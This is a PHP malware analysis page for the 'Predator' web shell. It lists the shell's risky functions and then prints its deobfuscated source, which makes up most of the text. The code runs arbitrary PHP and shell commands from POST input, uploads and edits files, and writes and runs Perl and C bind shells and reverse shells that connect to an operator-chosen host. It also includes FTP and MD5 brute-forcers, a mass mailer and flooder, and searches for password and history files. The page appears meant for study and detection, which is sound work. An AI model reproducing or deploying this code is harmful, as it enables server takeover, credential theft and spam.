PHP Malware Analysis
Predator.php
md5: 9a71dafe76c34fc36b0d8c8bbdf7165e
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original, Traces)
- set_time_limit (Deobfuscated, Original)
Execution
- eval (Deobfuscated, Original)
- exec (Deobfuscated, Original)
- passthru (Deobfuscated, Original)
- shell_exec (Deobfuscated, Original)
- system (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- .::Predator::. (Deobfuscated, HTML, Original)
URLs
- http://h0ld-up.info (Deobfuscated, HTML, Original)
- https://savannah.gnu.org/bugs/?func=additem&group=wget (Traces)
Deobfuscated PHP code
<?php
$auth = 0;
ini_set("session.gc_maxlifetime", 1);
session_start();
error_reporting(0);
safe_mode();
$name = "9b534ea55d0b82c3a7e80003a84b6865";
//login = 'mylogin'
$pass = "a029d0df84eb5549c641e04a9ef389e5";
//pass = 'mypass'
if (false) {
if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER']) != $name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW']) != $pass) {
header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
header("HTTP/1.0 401 Unauthorized");
exit("Access Denied");
}
}
if ($_GET['kill'] == 'yes') {
unlink($_SERVER['SCRIPT_FILENAME']);
echo "<script>alert('Your shell script was succefully deleted!')</script>";
}
function md5_brute($hash, $log, $dict)
{
ignore_user_abort(1);
set_time_limit(0);
$fl = fopen($dict, "r");
$fl = fopen($log, "w");
$count = 0;
if (!$dict) {
return "Fill 'dictionary_file' field!";
}
if (!$log) {
return "Fill 'log_file' field!";
} elseif (!strlen($hash) == 0) {
return "Fill 'md5_hash' field!";
} else {
while (!$feof($dict)) {
$pass = fgets($dict);
$brute_hash = md5($pass);
if ($brute_hash == $hash) {
fputs($log, "{$hash}:{$pass}\n---");
fclose($dict);
fclose($log);
exit;
} else {
$count += 1;
fputs($log, "{$count} passwords was bruted...");
}
}
fputs($log, "{$count} passwords are failed!");
}
fclose($dict);
fclose($log);
}
function port_bind($port, $pass, $method)
{
$perl = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS\r\nVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs\r\nJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV\r\nTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG\r\nlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK\r\nQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i\r\nOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N\r\nlIENPTk47DQpleGl0IDA7DQp9DQp9";
$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS\r\nA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I\r\nGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt\r\nb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9\r\npKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF\r\nNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK\r\nikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog\r\nICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk\r\n7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2\r\n9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld\r\n2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu\r\ndGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp\r\nlbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
if ($method == 'Perl') {
fputs($i = fopen('/tmp/shlbck', 'w'), "#!/usr/bin/perl\r\n\$SHELL=\"/bin/bash -i\";\r\nif (@ARGV < 1) { exit(1); }\r\n\$LISTEN_PORT=\$ARGV[0];\r\nuse Socket;\r\n\$protocol=getprotobyname('tcp');\r\nsocket(S,&PF_INET,&SOCK_STREAM,\$protocol) || die \"Cant create socket\\n\";\r\nsetsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);\r\nbind(S,sockaddr_in(\$LISTEN_PORT,INADDR_ANY)) || die \"Cant open port\\n\";\r\nlisten(S,3) || die \"Cant listen port\\n\";\r\nwhile(1)\r\n{\r\naccept(CONN,S);\r\nif(!(\$pid=fork))\r\n{\r\ndie \"Cannot fork\" if (!defined \$pid);\r\nopen STDIN,\"<&CONN\";\r\nopen STDOUT,\">&CONN\";\r\nopen STDERR,\">&CONN\";\r\nexec \$SHELL || die print CONN \"Cant execute \$SHELL\\n\";\r\nclose CONN;\r\nexit 0;\r\n}\r\n}");
fclose($i);
ex(which("perl") . " /tmp/shlbck " . $port . " &");
unlink("/tmp/shlbck");
return ex('ps -aux | grep shlbck');
} elseif ($method == 'C#') {
fputs($i = fopen('/tmp/shlbck.c', 'w'), "#include <stdio.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\nint main(argc,argv)\r\nint argc;\r\nchar **argv;\r\n{ \r\n int sockfd, newfd;\r\n char buf[30];\r\n struct sockaddr_in remote;\r\n if(fork() == 0) { \r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(atoi(argv[1]));\r\n remote.sin_addr.s_addr = htonl(INADDR_ANY); \r\n sockfd = socket(AF_INET,SOCK_STREAM,0);\r\n if(!sockfd) perror(\"socket error\");\r\n bind(sockfd, (struct sockaddr *)&remote, 0x10);\r\n listen(sockfd, 5);\r\n while(1)\r\n {\r\n newfd=accept(sockfd,0,0);\r\n dup2(newfd,0);\r\n dup2(newfd,1);\r\n dup2(newfd,2);\r\n write(newfd,\"Password:\",10);\r\n read(newfd,buf,sizeof(buf));\r\n if (!chpass(argv[2],buf))\r\n system(\"echo welcome to r57 shell && /bin/bash -i\");\r\n else\r\n fprintf(stderr,\"Sorry\");\r\n close(newfd);\r\n }\r\n }\r\n}\r\nint chpass(char *base, char *entered) {\r\nint i;\r\nfor(i=0;i<strlen(entered);i++) \r\n{\r\nif(entered[i] == '\\n')\r\nentered[i] = '\\0'; \r\nif(entered[i] == '\\r')\r\nentered[i] = '\\0';\r\n}\r\nif (!strcmp(base,entered))\r\nreturn 0;\r\n}");
fclose($i);
ex("gcc shlbck.c -o shlbck");
unlink('shlbck.c');
ex("/tmp/shlbck " . $port . " " . $pass . " &");
unlink("/tmp/shlbck");
return ex('ps -aux | grep shlbck');
} else {
return "Choose method";
}
}
function backconnect($ip, $port, $method)
{
$perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj\r\naG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR\r\nhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT\r\nsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI\r\nkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi\r\nKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl\r\nOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC\r\nBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb\r\nSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd\r\nKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ\r\nsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC\r\nAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D\r\nQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp\r\nOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if ($method == 'Perl') {
fputs($i = fopen('/tmp/shlbck', 'w'), "#!/usr/bin/perl\r\nuse Socket;\r\n\$cmd= \"lynx\";\r\n\$system= 'echo \"`uname -a`\";echo \"`id`\";/bin/sh';\r\n\$0=\$cmd;\r\n\$target=\$ARGV[0];\r\n\$port=\$ARGV[1];\r\n\$iaddr=inet_aton(\$target) || die(\"Error: \$!\\n\");\r\n\$paddr=sockaddr_in(\$port, \$iaddr) || die(\"Error: \$!\\n\");\r\n\$proto=getprotobyname('tcp');\r\nsocket(SOCKET, PF_INET, SOCK_STREAM, \$proto) || die(\"Error: \$!\\n\");\r\nconnect(SOCKET, \$paddr) || die(\"Error: \$!\\n\");\r\nopen(STDIN, \">&SOCKET\");\r\nopen(STDOUT, \">&SOCKET\");\r\nopen(STDERR, \">&SOCKET\");\r\nsystem(\$system);\r\nclose(STDIN);\r\nclose(STDOUT);\r\nclose(STDERR);");
fclose($i);
ex(which("perl") . " /tmp/shlbck " . $ip . " " . $port . " &");
unlink("/tmp/shlbck");
return ex('netstat -an | grep -i listen');
} elseif ($method == 'C#') {
fputs($i = fopen('/tmp/shlbck.c', 'w'), "#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\nint main(int argc, char *argv[])\r\n{\r\n int fd;\r\n struct sockaddr_in sin;\r\n char rms[21]=\"rm -f \"; \r\n daemon(1,0);\r\n sin.sin_family = AF_INET;\r\n sin.sin_port = htons(atoi(argv[2]));\r\n sin.sin_addr.s_addr = inet_addr(argv[1]); \r\n bzero(argv[1],strlen(argv[1])+1+strlen(argv[2])); \r\n fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; \r\n if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {\r\n perror(\"[-] connect()\");\r\n exit(0);\r\n }\r\n strcat(rms, argv[0]);\r\n system(rms); \r\n dup2(fd, 0);\r\n dup2(fd, 1);\r\n dup2(fd, 2);\r\n execl(\"/bin/sh\",\"sh -i\", NULL);\r\n close(fd); \r\n}");
fclose($i);
ex("gcc shlbck.c -o shlbck");
unlink('shlbck.c');
ex("/tmp/shlbck " . $ip . " " . $port . " &");
unlink("/tmp/shlbck");
return ex('netstat -an | grep -i listen');
} else {
return "Choose method";
}
}
if ($_POST['type'] == 11) {
download(stripslashes($_POST['value']));
}
function download($dfilename)
{
$file = fopen($dfilename, "r");
ob_clean();
$filename = basename($dfilename);
$filedump = fread($file, @filesize($dfilename));
fclose($file);
header("Content-type: " . $mime_type);
header("Content-disposition: attachment; filename=\"" . $filename . "\";");
echo $filedump;
}
function flooder($logf, $to, $from, $subject, $msg, $amount, $check)
{
ignore_user_abort(1);
set_time_limit(0);
$fl = fopen($logf, "w");
$count = 0;
if (!$logf) {
return "Fill 'log_file' field!";
} elseif (!$to) {
return "Fill 'Send to' field!";
} elseif (!$from) {
return "Fill 'From' field!";
} elseif (!$subject) {
return "Fill 'Subject' field!";
} elseif (!$msg) {
return "Fill 'Message' field!";
} elseif (!$amount) {
return "Fill 'Amount' field!";
} else {
while ($count < $amount) {
mail("{$to}", "{$subject}", "{$msg}", "From: {$from}");
$count += 1;
$fl = fopen($logf, "w");
fputs($fl, "{$count} flood-letters was sended...");
fclose($fl);
}
if (strlen($check) != 0) {
$check_text = "Done! {$count} flood-letters was sended!";
$check_sub = 'Check';
mail("{$check}", "Check", "{$check_text}", "From: {$from}");
$fl = fopen($logf, "w");
fputs($fl, "Done! {$count} flood-letters was sended!");
} else {
$fl = fopen($logf, "w");
fputs($fl, "Done! {$count} flood-letters was sended!");
}
}
fclose($fl);
}
function ftp_brute($host, $ftp_users, $ftp_passwd, $ftp_log)
{
ignore_user_abort(1);
set_time_limit(0);
$fl = fopen($ftp_users, "r");
$fd = fopen($ftp_passwd, "r");
$fr = fopen($ftp_log, "a+");
if (!$host) {
return "Fill 'Host' field!";
} elseif (!$ftp_users) {
return "Fill 'ftp_users file' field!";
} elseif (!$ftp_passwd) {
return "Fill 'ftp_passwd file' field!";
} elseif (!$ftp_log) {
return "Fill 'ftp_log file' field!";
} elseif (!file_exists($ftp_users)) {
return "File " . $ftp_users . " doesn't exists!";
} elseif (!file_exists($ftp_passwd)) {
return "File " . $ftp_passwd . " doesn't exists!";
} else {
while (!feof($fd)) {
$pass = fgets($fd);
while (!feof($fl)) {
$user = fgets($fl);
$connect = ftp_connect($host);
if (!$connect) {
fputs($fr, "Enable connect to {$host}\n");
exit;
} else {
$auth = ftp_login($connect, $user, $pass);
if (!$auth) {
ftp_quit($connect);
} else {
fputs($fr, "{$host}:\n---{$login}:{$pass}\n---");
ftp_quit($connect);
}
}
}
}
fputs($fr, "Done:\n");
fclose($fr);
}
fclose($fl);
fclose($fd);
}
function spammer($from, $subject, $msg, $check, $elist, $logf)
{
ignore_user_abort(1);
set_time_limit(0);
$fp = fopen($elist . "r");
$fl = fopen($logf, "w");
$count = 0;
if (!$from) {
return "Fill 'From' field!";
} elseif (!$elist) {
return "Fill 'Emails list' field!";
} elseif (!$logf) {
return "Fill 'Log File' field!";
} elseif (!$msg) {
return "Fill 'Message' field!";
} elseif (!$subject) {
return "Fill 'Subject' field!";
} elseif (!file_exists($elist)) {
return "File " . $elist . " doesn't exists!";
} else {
while (!feof($fp)) {
$to = fgets($fp);
mail("{$to}", "{$subject}", "{$msg}", "From: {$from}");
$count += 1;
$fl = fopen($logf, "w");
fputs($fl, "{$count} letters was sended...");
fclose($fl);
}
if (strlen($check) != 0) {
$check_text = "Done! {$count} letters was sended!";
$check_sub = 'Check';
mail("{$check}", "Check", "{$check_text}", "From: {$from}");
$fl = fopen($logf, "w");
fputs($fl, "Done! {$count} letters was sended!\n");
} else {
$fl = fopen($logf, "w");
fputs($fl, "Done! {$count} letters was sended!");
}
}
fclose($fp);
fclose($fl);
}
function alias($in)
{
if ($in == "find apahce config file") {
return ex('find / -type f -name httpd.conf');
} elseif ($in == "find access_log files") {
return ex('find / -type f -name access_log');
} elseif ($in == "find error_log files") {
return ex('find / -type f -name error_log');
} elseif ($in == "find suid files") {
return ex('find / -type f -perm -04000 -ls');
} elseif ($in == "find suid files in current dir") {
return ex('find . -type f -perm -04000 -ls');
} elseif ($in == "find sgid files") {
return ex('find / -type f -perm -02000 -ls');
} elseif ($in == "find sgid files in current dir") {
return ex('find . -type f -perm -02000 -ls');
} elseif ($in == "find config.inc.php files") {
return ex('find / -type f -name config.inc.php');
} elseif ($in == "find config.inc.php files in current dir") {
return ex('find . -type f -name config.inc.php');
} elseif ($in == "find config* files") {
return ex('find / -type f -name "config*"');
} elseif ($in == "find config* files in current dir") {
return ex('find . -type f -name "config*"');
} elseif ($in == "find all writable files") {
return ex('find / -type f -perm -2 -ls');
} elseif ($in == "find all writable files in current dir") {
return ex('find . -type f -perm -2 -ls');
} elseif ($in == "find all writable directories") {
return ex('find / -type d -perm -2 -ls');
} elseif ($in == "find all writable directories in current dir") {
return ex('find . -type d -perm -2 -ls');
} elseif ($in == "find all writable directories and files") {
return ex('find / -perm -2 -ls');
} elseif ($in == "find all writable directories and files in current dir") {
return ex('find . -perm -2 -ls');
} elseif ($in == "find all service.pwd files") {
return ex('find / -type f -name service.pwd');
} elseif ($in == "find service.pwd files in current dir") {
return ex('find . -type f -name service.pwd');
} elseif ($in == "find all .htpasswd files") {
return ex('find / -type f -name .htpasswd');
} elseif ($in == "find .htpasswd files in current dir") {
return ex('find . -type f -name .htpasswd');
} elseif ($in == "find all .bash_history files") {
return ex('find / -type f -name .bash_history');
} elseif ($in == "find .bash_history files in current dir") {
return ex('find . -type f -name .bash_history');
} elseif ($in == "find all .mysql_history files") {
return ex('find / -type f -name .mysql_history');
} elseif ($in == "find .mysql_history files in current dir") {
return ex('find . -type f -name .mysql_history');
} elseif ($in == "find all .fetchmailrc files") {
return ex('find / -type f -name .fetchmailrc');
} elseif ($in == "find .fetchmailrc files in current dir") {
return ex('find . -type f -name .fetchmailrc');
} elseif ($in == "list file attributes on a Linux second extended file system") {
return ex('lsattr -va');
} elseif ($in == "show opened ports") {
return ex('netstat -an | grep -i listen');
} elseif ($in == "---------------------------------------------------------------------------------------------------------") {
return ex('ls -la');
}
}
function testperl()
{
if (ex('perl -h')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function testlynx()
{
if (ex('lynx --help')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function view_size($size)
{
if ($size >= 1073741824) {
$size = @round($size / 1073741824 * 100) / 100 . " GB";
} elseif ($size >= 1048576) {
$size = @round($size / 1048576 * 100) / 100 . " MB";
} elseif ($size >= 1024) {
$size = @round($size / 1024 * 100) / 100 . " KB";
} else {
$size .= " B";
}
return $size;
}
function testfetch()
{
if (ex('fetch --help')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function testwget()
{
if (ex('wget --help')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function oracle()
{
if (function_exists('ocilogon')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function postgresql()
{
if (function_exists('pg_connect')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function testmssql()
{
if (function_exists('mssql_connect')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function testcurl()
{
if (function_exists('curl_version')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function testmysql()
{
if (function_exists('mysql_connect')) {
return "<font size=2 color=green>ON</font>";
} else {
return "<font size=2 color=red>OFF</font>";
}
}
function safe_mode()
{
if (!$safe_mode && strpos(ex("echo abch0ld"), "h0ld") != 3) {
$_SESSION['safe_mode'] = 1;
return "<font size=2 color=green>ON</font>";
} else {
$_SESSION['safe_mode'] = 0;
return "<font size=2 color=red>OFF</font>";
}
}
function ex($in)
{
$out = '';
if (function_exists('exec')) {
exec($in, $out);
$out = join("\n", $out);
} elseif (function_exists('passthru')) {
ob_start();
passthru($in);
$out = ob_get_contents();
ob_end_clean();
} elseif (function_exists('system')) {
ob_start();
system($in);
$out = ob_get_contents();
ob_end_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = popen($in, "r"))) {
$out = "";
while (!@feof($f)) {
$out .= fread($f, 1024);
}
pclose($f);
}
return $out;
}
function shell()
{
if ($_POST['type'] == 1) {
eval(stripslashes($_POST['value']));
} elseif ($_POST['type'] == 2) {
pwd();
print_r(ex(stripslashes($_POST['value'])));
} elseif ($_POST['type'] == 3) {
if ($_SESSION['safe_mode'] == 1) {
if (($u = safe_ex('ls -la')) != '') {
return $u;
} else {
return safe_ex('dir');
}
} else {
if (($u = ex('ls -la')) != '') {
return $u;
} else {
return ex('dir');
}
}
} elseif ($_POST['type'] == 4) {
if (file_exists(stripslashes($_POST['value']))) {
if ($safe_mode != 1) {
echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value']))));
} else {
echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
}
$_SESSION['edit'] = 1;
$_SESSION['filename'] = $_POST['value'];
} else {
return "File doesn't exists!";
}
} elseif ($_POST['type'] == 5) {
fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value']));
} elseif ($_POST['type'] == 6) {
$uploaddir = pwd();
if (!($name = $_POST['newname'])) {
$name = $_FILES['userfile']['name'];
}
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
} elseif ($_POST['type'] == 7) {
echo alias($_POST['value']);
} elseif ($_POST['type'] == 8) {
echo spammer(stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['check']), stripslashes($_POST['elist']), stripslashes($_POST['logf']));
} elseif ($_POST['type'] == 9) {
echo ftp_brute(stripslashes($_POST['host']), stripslashes($_POST['users']), stripslashes($_POST['passwd']), stripslashes($_POST['log']));
} elseif ($_POST['type'] == 10) {
echo flooder(stripslashes($_POST['log']), stripslashes($_POST['to']), stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['amount']), stripslashes($_POST['check']));
} elseif ($_POST['type'] == 12) {
echo backconnect(stripslashes($_POST['ip']), stripslashes($_POST['port']), stripslashes($_POST['method']));
} elseif ($_POST['type'] == 13) {
echo backconnect(stripslashes($_POST['port']), stripslashes($_POST['pass']), stripslashes($_POST['method']));
} elseif ($_POST['type'] == 14) {
echo md5_brute(stripslashes($_POST['hash']), stripslashes($_POST['log']), stripslashes($_POST['dict']));
} else {
$u = ex('ls -la');
if ($u == '') {
return ex('dir');
} else {
return $u;
}
}
return null;
}
function edit()
{
if ($_SESSION['edit'] == 1) {
$_SESSION['edit'] = 0;
return "<br><center><input type=submit style=\"border:1px solid #666666;background:#333333;font-weight:bold;\" value=\"Save\"></center>";
}
}
function getsystem()
{
return php_uname('s') . " " . php_uname('r') . " " . php_uname('v');
}
function getserver()
{
return getenv("SERVER_SOFTWARE");
}
function getuser()
{
$out = get_current_user();
if ($out != "SYSTEM") {
if (($out = ex('id')) == '') {
$out = "uid=" . getmyuid() . "(" . get_current_user() . ") gid=" . getmygid();
}
}
return $out;
}
function pwd()
{
if ($_POST['type'] == 3) {
$_SESSION['pwd'] = stripslashes($_POST['value']);
}
chdir($_SESSION['pwd']);
$cwd = getcwd();
if ($u = strrpos($cwd, '/')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '/';
} else {
return $cwd;
}
} elseif ($u = strrpos($cwd, '\\')) {
if ($u != strlen($cwd) - 1) {
return $cwd . '\\';
} else {
return $cwd;
}
}
}
function safe_ex($in)
{
if ($in) {
$d = dir('.');
while (false !== ($file = $d->read())) {
if ($file == "." || $file == "..") {
continue;
}
@clearstatcache();
list($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if (!$unix) {
echo date("d.m.Y\t H:i", $mtime) . "\t";
if (@is_dir($file)) {
echo " <DIR> ";
} else {
printf("% 7s ", $size);
}
} else {
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode . " ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ", $nlink, $owner['name'], $grgid['name'], $size);
echo date("d.m.Y H:i ", $mtime);
}
echo "{$file}\n";
}
$d->close();
}
function safe_read($in)
{
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include "/etc/passwd";
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
file_get_contents($in);
}
}
?>
<html>
<head>
<title>.::Predator::.</title>
<META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
.ta {background: #333333; border:1px solid #666666; color: #FFFFFF;}
.bt {border: 1px solid #666666;background: #333333;font-weight:bold;}
.td1 {border:2px solid #000000;}
.td2 {border:1px solid #000000;}
.ram {border:1px solid #666666;background:#222222;}
body { scrollbar-base-color: #333333}
</style>
<script>
function kill()
{
var y;
y = confirm('Are you really want to kill shell?');
if(y == true)
{
document.location = '?kill=yes';
}
}
</script>
</head>
<body bgcolor='#000000'>
<center><table width=90% cellpadding=0 cellspacing=0 style="border: 1px solid #666666">
<tr><td width=100% height=70 bgcolor='#333333' style="border-bottom: 2px solid #666666" valign=top>
<table valign=top>
<tr><td valign=top>
<table valign=center class='ram'>
<tr><td width=5% align=right>
<font size=2 color=#888888>System:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php
echo getsystem();
?></b></font>
</td></tr>
<tr><td width=5% align=right>
<font size=2 color=#888888>Server:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php
echo getserver();
?></b></font>
</td></tr>
<tr><td width=5% align=right>
<font size=2 color=#888888>User:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php
echo getuser();
?></b></font>
</td></tr>
<tr><td width=5% align=right>
<font size=2 color=#888888>pwd:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php
if (strlen($u = pwd()) > 45) {
echo "..." . substr($u, strlen($u) - 40, 40);
} else {
echo $u;
}
?></b></font>
</td></tr>
</table>
</td>
<td width=13% valign=center align=center>
<table width=100% height=100% cellpadding=0 cellspacing=0><tr><td width=100% height=100%>
<center>
<a href="http://h0ld-up.info"><table cellpadding=2 cellspacing=2 style="border:1px solid #666666;background:#444444">
<tr><td><font size=2 color=#999999>
<center><b>.::h0ld-up-team::.<br>web-shell</b></center>
</font></td></tr></table></a></center>
